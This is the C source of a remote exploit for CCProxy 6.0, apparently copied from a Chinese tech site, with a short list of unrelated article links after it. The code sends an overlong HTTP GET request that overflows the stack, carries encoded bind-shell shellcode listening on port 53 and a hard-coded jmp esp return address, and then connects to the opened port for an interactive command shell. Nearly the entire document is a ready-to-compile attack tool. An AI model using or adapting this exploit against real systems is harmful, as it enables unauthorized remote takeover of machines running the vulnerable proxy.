CCproxy 6 Exploit CN Version

/*

* ccpx.c - x86/win32 CCProxy 6.0 remote stack buffer overflow exploit

* Author : isno <isno@xfocus.org>

* Complie : cl ccpx.c

* Usage : ccpx <target_ip> [target_port]

* default target_port is 808

* Stronger By Goldsun 5261314@sohu.com

*/

#include <stdio.h>

#include <stdlib.h>

#include <Winsock2.h>

#include <windows.h>

#pragma comment (lib,"ws2_32")

#define PPORT 808

#define XPORT 53

//lion's shellcode bind port 53

unsigned char shellcode[] =

"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA"

"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

// shellcode

"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"

"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"

"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"

"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"

"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"

"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"

"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"

"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"

"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"

"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x99\xAC\xAA\x59\x10\xDE\x9D"

"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"

"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"

"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"

"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"

"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"

"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59"

"\x35" //port

"\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"

"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"

"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"

"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"

"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"

"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"

"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"

"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";

int Make_Connection(char *address,int port,int timeout);

void shell (int sock);

int main(int argc, char * argv[])

{

SOCKET csock, s2;

WSADATA WSAData;

int yn, offset, ret, pport;

char line[80];

char buf[8000], sbuf[10000];

char local[100] = {0};

char *localip;

struct hostent * pHost;

if(argc<2)

{

printf("CCPROXY 6 Exploit CN Writen By isno@xfocus.org & Compiled By Goldsun\n");

printf("Usage: %s <target_ip> [target_port] [offset]\ndefault port is 808\n", argv[0]);

return 1;

}

if(argc>=3)

pport=atoi(argv[2]);

else

pport=PPORT;

if(argc>=4)offset=atoi(argv[3]);

if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)

{

printf("[-] WSAStartup failed.\n");

WSACleanup();

exit(1);

}

// 获取本机名

gethostname((char*)local, sizeof(local)-1);

// 获取本地 IP 地址

pHost = gethostbyname((char*)local);

localip = inet_ntoa(*(IN_ADDR *)pHost->h_addr_list[0]);

//offset=15-strlen(localip); //offset from target_ip len ret addr

offset=2;

printf("Local IP: %s Target IP: %s:%d\n",localip,argv[1],pport);

printf("Target in the same subnet? [y/n] ");

yn = _getch();

if(yn == 0x6e || yn == 0x4e)

{

printf("\r\nHave real Internet Ip Address ? [y/n] ");

yn = _getch();

if(yn == 0x6e || yn == 0x4e)

{

printf("\r\nYour gateway Internet ip address: ");

gets(line);

offset=15-strlen(line);

}

}

//如果攻击目标为本地地址，则需要调整offset

if(strcmp(argv[1], "localhost") == 0 || strcmp(argv[1], "127.0.0.1") == 0)

//offset=15-strlen("127.0.0.1");

offset=6;

printf("\r\n[+] connecting to %s:%d\n", argv[1], pport);

csock = Make_Connection(argv[1], pport, 10);

if(csock<0)

{

printf("[-] connect err.\n");

exit(1);

}

printf("Offset: %d",offset);

memset(buf, 0, sizeof(buf)-1);

memset(buf, 0x41, 4045+offset);

memcpy(buf+strlen(buf)-strlen(shellcode), shellcode, strlen(shellcode));

printf(" Magic Length: %d + 16 =",strlen(buf));

strcat(buf, "\xcd\x54\xfa\x7f"); //ret addr jmp esp

strcat(buf, "\xb9\x41\x41\x41\x25\xc1\xe9\x14\x2b\xe1\xff\xe4"); //jmp back

sprintf(sbuf, "GET /%s HTTP/1.0\r\n\r\n", buf);

printf(" buffer length: %d\n",strlen(buf));

printf("[+] send magic buffer...\n");

ret=send(csock, sbuf,strlen(sbuf), 0);

if(ret<=0)

{

printf("[-] send err.\n");

exit(1);

}

closesocket(csock);

Sleep(1000);

printf("[+] connecting to CMD shell port...\n");

s2 = Make_Connection(argv[1], XPORT, 10);

if(s2<0)

{

printf("[-] connect err:-<maybe there's firewall\n");

exit(1);

}

shell(s2);

WSACleanup();

return 0;

}

// 解析域名

unsigned int resolve(char *name)

{

struct hostent *he;

unsigned int ip;

if((ip=inet_addr(name))==(-1))

{

if((he=gethostbyname(name))==0)

return 0;

memcpy(&ip,he->h_addr,4);

}

return ip;

}

// 建立TCP连接

// 输入:

// char * address IP地址

// int port 端口

// int timeout 延时

// 输出:

// 返回:

// 成功 >0

// 错误 <=0

int Make_Connection(char *address,int port,int timeout)

{

struct sockaddr_in target;

SOCKET s;

int i;

DWORD bf;

fd_set wd;

struct timeval tv;

s = socket(AF_INET,SOCK_STREAM,0);

if(s<0)

return -1;

target.sin_family = AF_INET;

target.sin_addr.s_addr = resolve(address);

if(target.sin_addr.s_addr==0)

{

closesocket(s);

return -2;

}

target.sin_port = htons(port);

bf = 1;

ioctlsocket(s,FIONBIO,&bf);

tv.tv_sec = timeout;

tv.tv_usec = 0;

FD_ZERO(&wd);

FD_SET(s,&wd);

connect(s,(struct sockaddr *)&target,sizeof(target));

if((i=select(s+1,0,&wd,0,&tv))==(-1))

{

closesocket(s);

return -3;

}

if(i==0)

{

closesocket(s);

return -4;

}

i = sizeof(int);

getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);

if((bf!=0)||(i!=sizeof(int)))

{

closesocket(s);

return -5;

}

ioctlsocket(s,FIONBIO,&bf);

return s;

}

/* ripped from TESO code and modifed by ey4s for win32 */

void shell (int sock)

{

int l;

char buf[512];

struct timeval time;

unsigned long ul[2];

time.tv_sec = 1;

time.tv_usec = 0;

while (1)

{

ul[0] = 1;

ul[1] = sock;

l = select (0, (fd_set *)&ul, NULL, NULL, &time);

if(l == 1)

{

l = recv (sock, buf, sizeof (buf), 0);

if (l <= 0)

{

printf ("[-] Connection closed.\n");

return;

}

l = write (1, buf, l);

if (l <= 0)

{

printf ("[-] Connection closed.\n");

return;

}

}

else

{

l = read (0, buf, sizeof (buf));

if (l <= 0)

{

printf("[-] Connection closed.\n");

return;

}

l = send(sock, buf, l, 0);

if (l <= 0)

{

printf("[-] Connection closed.\n");

return;

}

}

}

}

• ·在Linux下安装Oracle9i
• ·Samba
• ·网站标题设计与搜索引擎
• ·asp.net中合并DataGrid行
• ·finding hidden modules
• ·Word编程中，事件的作用和顺序
• ·创业中的一点点心情，与大家分享！希望大家多多支
• ·validate框架构建顺序
• ·knoppix
• ·61条面向对象设计的经验原则-《OOD启示录》